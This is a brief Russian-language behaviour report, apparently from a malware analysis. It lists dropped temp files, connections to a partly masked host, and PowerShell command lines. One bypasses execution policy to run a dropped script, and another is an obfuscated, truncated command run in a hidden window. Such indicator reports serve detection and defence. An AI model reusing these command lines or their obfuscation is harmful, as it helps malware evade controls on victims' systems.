Техническая информация
- %TEMP%\dll01.txt
- %TEMP%\dll02.txt
- 'i.###timg.cc':443
- 'i.###timg.cc':443
- DNS ASK i.###timg.cc
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File %TEMP%\qwrwd.ps1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $ZcFeM = 'Ww' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAHIAdg' + [char]66 + 'pAGMAZQ' + [char]66 + 'QAG8AaQ' + [char]66 + 'uAHQATQ' +... (со скрытым окном)